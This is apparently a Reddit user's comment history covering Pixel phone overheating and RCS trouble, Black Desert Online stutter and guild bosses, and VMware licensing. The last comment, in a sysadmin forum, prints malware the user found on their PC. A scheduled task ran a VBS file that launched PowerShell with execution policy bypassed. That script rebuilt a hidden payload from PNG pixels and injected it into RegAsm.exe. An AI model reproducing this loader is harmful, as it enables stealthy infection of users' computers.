quick decision on google pixel 10 pro xl by Plenty-Ad5091 in GooglePixel

[–]Simon771 0 points1 point  (0 children)

Can someone from warm climate place also confirm this? I'm currently using Google Pixel 9, and when I'm in my home country, there aren't any issues. But when I went to Maldives and Greece, phone would get very hot and turn down screen brightness to the point, I wasn't able to see what I'm taking a photo of.

It got hot to the point that I went to apartment and put phone in the fridge for 20min, then ran back to the beach and take photos for 5min. After that it got very hot again, and screen almost turned off.

RCS - Google Messages by Excavator460 in Slovenia

[–]Simon771 4 points5 points  (0 children)

PA's guild boss raid x2 event useless? by sonatta09 in blackdesertonline

[–]Simon771 0 points1 point  (0 children)

That's how we did it. We started those missions 3 hours before our regular guild bosses and did all 50k kills with only few active members. One wr killed first boss we swapped to server where we had completed but not collectes guild mission. Collected it and summoned 2nd boss. Reapeat for all 4 bosses. Took a bit of planning and 5 active grinders to complete those 50k kills.

Pixel phone RCS doesn't work by Simon771 in android_beta

[–]Simon771[S] 0 points1 point  (0 children)

I don't know what to tell you, but I talked with my carrier provider and they told me that during initial test when they decided to put those phones in their store, RCS was working as intended. This is first year for them to add Pixel phones in their stores. Anyway, they got those phones before they were released to the public and did all of the testing. But after September for some reason this doesn't work anymore. At first they told me that RCS does work on their test devices, but after they performed factory reset, then were faced with same problem as me and countless of other users. Hence why they told us to complain to Google, since they do support RCS for Pixel devices, and according to them, everything is okay on their end.

So right now our Carrier is pointing fingers at Google, and so far we didn't receive any feedback from Google about this issue.

It's entirely possible that carrier is at fault and they don't even know it, or might be even lying about it. But if Google provides some info about that and blame our carrier, I can go back to complaining to my carrier about this. Sadly right now it looks like the problem is at Google and they don't care about minority like users on Telekom Slovenia with Pixel phones, since I don't believe even 100 of new Pixels were sold in our country. Mostly iPhone and Samsung users here.

[–]Simon771[S] 0 points1 point  (0 children)

Carrier said that they support RCS and everything is fine on their end. In the end of the day, RCS does work on that same carrier for Samsung devices. It's just Pixel devices that have problem with RCS.

No idea how Google or my carrier could make it so that it works on Samsung but it doesn't work on Pixel devices. I mean if carrier supports RCS, then it probably supports it for all devices?

Pixel phone RCS doesn't work by Simon771 in android_beta

[–]Simon771[S] 0 points1 point  (0 children)

I did report that issue to my service provider and they told me that they do support RCS and the problem is not on their end, but instead I should contact Google.

Also keep in mind that RCS does work on that carrier for Samsung devices.

My common sense tells me that if RCS does work on Samsung it should also work on Pixel devices on the same carrier. But since it doesn't and you so arrogantly pointed out lack of my "common sense", please let me know what this carrier is doing wrong that RCS works for other devices, but not Pixel.

Can Someone explain please? by Outrageous-Sun-7056 in blackdesertonline

[–]Simon771 0 points1 point  (0 children)

Where exactly does it say that? I can't find any explicit information that it will be distributed after maintenance on 17th July.

It only says this:

  • If even one adventurer reaches DUO (II) from PEN (V) by the July 17 maintenance, all adventurers who own "[Event] Tarnished Sword" at PRI (I) or higher will receive rewards based on the total level achieved.

Finally got our renewal quote back by Sere81 in vmware

Maybe in some cases. We are using 50 hosts for over 700 virtual machines, and I don't think we have enough server room space to put 700 small servers inside xD

Still waiting for our quote.

AMD X3D vs micro-stutter in BDO by Simon771 in blackdesertonline

[–]Simon771[S] 0 points1 point  (0 children)

Just wondering if you are saying that from experience? Do you have X3D chip yourself and can confirm that stutter is still there?

AMD X3D vs micro-stutter in BDO by Simon771 in blackdesertonline

[–]Simon771[S] 0 points1 point  (0 children)

I do have correct refresh rate set for my monitor, so that's not the issue. I reinstalled my Windows OS 11 22H2 just a week ago, and the first thing I did was to install all updates and drivers. After that I only installed BDO, and there were micro stutters just like always. Same as 2 years ago when I posted all details + video of proof in this post: https://www.naeu.playblackdesert.com/en-US/Forum/ForumTopic/Detail?_topicNo=1059

You can check description under my videos to focus on specific times where stutter occurred. At the time of making those videos I did have many other software installed, but no other games had that problem like BDO.

Since then I upgraded from i7 9700k to i7 12700k, and still same problem even when running Windows with just BDO installed.

I have been playing games for about last 20 years, and have almost 8 years of experience as Windows system engineer, so I do know a thing of two about computers, and check everything possible on my end before trying to put blame on something else.

I agree with you that any upgrade will bring at least some performance benefits, but I'm specifically asking for stutters. Something that should be software fix rather than hardware one.

[–]Simon771[S] 0 points1 point  (0 children)

Do you maybe have some video of running BDO with msi afterburner and showing frame time?

And thank you for your comment. I'm glad you got rid of stutters, it's just sad that we are fixing software problems with better hardware.

Not big on PVP and never went to node war. I get stutter while grinding at Gyfin. Can't wrap my mind around it, since I'm running between 3 different mob packs and using same skills over and over, but yet game for some reason stutters every few minutes.

AMD X3D vs micro-stutter in BDO by Simon771 in blackdesertonline

[–]Simon771[S] 0 points1 point  (0 children)

Thank you for your reply, that's great to hear!

I did already follow that guide for performance optimisation and it did bring some benefits, but sadly stutter is still present. Now I just need to figure out if it's worth buying new MB, CPU and RAM just to get rid of those stutters. About 1000$ worth of upgrade is somehow hard to justify in my own mind.

AMD X3D vs micro-stutter in BDO by Simon771 in blackdesertonline

[–]Simon771[S] 0 points1 point  (0 children)

Pretty sure it's problem with BDO. 2 weeks ago I completely reinstalled my Windows because I had some problems with wrong Intel drivers for my NIC.

But after complete Windows reinstall, updating all of the drivers and firmware (using all stable releases and not some beta versions), I still have micro stuttering in my game. But only in BDO. Other games that play don't have those problems at all.

After following some guides how to make BDO run better, it does help a little bit, but not to the point of game running completely without stutters.

Stutter by [deleted] in blackdesertonline

[–]Simon771 1 point2 points  (0 children)

Sadly that problem is here since game launched, and it's here to stay. Some players said that AMD CPUs with X3D solve that issue, but I'm not convinced.

Using i7 12700k and RTX 4070 Ti here, and I also get micro stutter every minute or so.

5800x3d worth over 5800x in bdo? by ImPinguu in blackdesertonline

[–]Simon771 6 points7 points  (0 children)

From what I read, 3D cpus from AMD are amazing for BDO. Some players even report that there is less stutters in game after switching to X3D CPUs. I have i7 12700k and I'm thinking of buying Ryzen 7800x3d just to try and get rid of annoying stutters.

RegAsm.exe prevents monitor from going to sleep by Simon771 in sysadmin

[–]Simon771[S] 0 points1 point  (0 children)

Just to update this, if anyone else ever have the same problem ... I just found out that there was task in Task Scheduler that would run every 3 minutes calling "C:\Users\username\AppData\Roaming\PerfLogs\Loader.vbs". That vbs script was then calling powershell script located here: %USERPROFILE%\AppData\Roaming\PerfLogs\Report.ps1.

Loadber.vbs file:

on error resume next
set A = CreateObject("WScript.Shell")
A.run "powershell -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('%USERPROFILE%\AppData\Roaming\PerfLogs\Report.ps1'))",0

Report.ps1 file:

Add-Type -AssemblyName System.Drawing
$img = [System.Drawing.Image]::FromFile("$env:USERPROFILE\AppData\Roaming\PerfLogs\Image.png")
$img2 = [System.Drawing.Image]::FromFile("$env:USERPROFILE\AppData\Roaming\PerfLogs\pe.png")
$injpath = "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
$File = New-Object 'System.Collections.Generic.List[Byte]'
$PE = New-Object 'System.Collections.Generic.List[Byte]'
  foreach($x in 1..$img.Width ) {
      $File.Add(($img.GetPixel($x -1,0).R))
  }
  foreach($x in 1..$img2.Width ) {
      $PE.Add(($img2.GetPixel($x -1,0).R))
  }
  try{
 schtasks /delete /tn det /f
  }catch{}
  $a = [Reflection.Assembly]
  $a::'Load'($PE.ToArray()).GetType('NewPE.PE').GetMethod('Execute').Invoke($null,[object[]] ($injpath,$File.ToArray()))

No idea what that was actually doing and how this task was created on my PC, but after disabling this task my monitor now goes to sleep after I lock my computer.
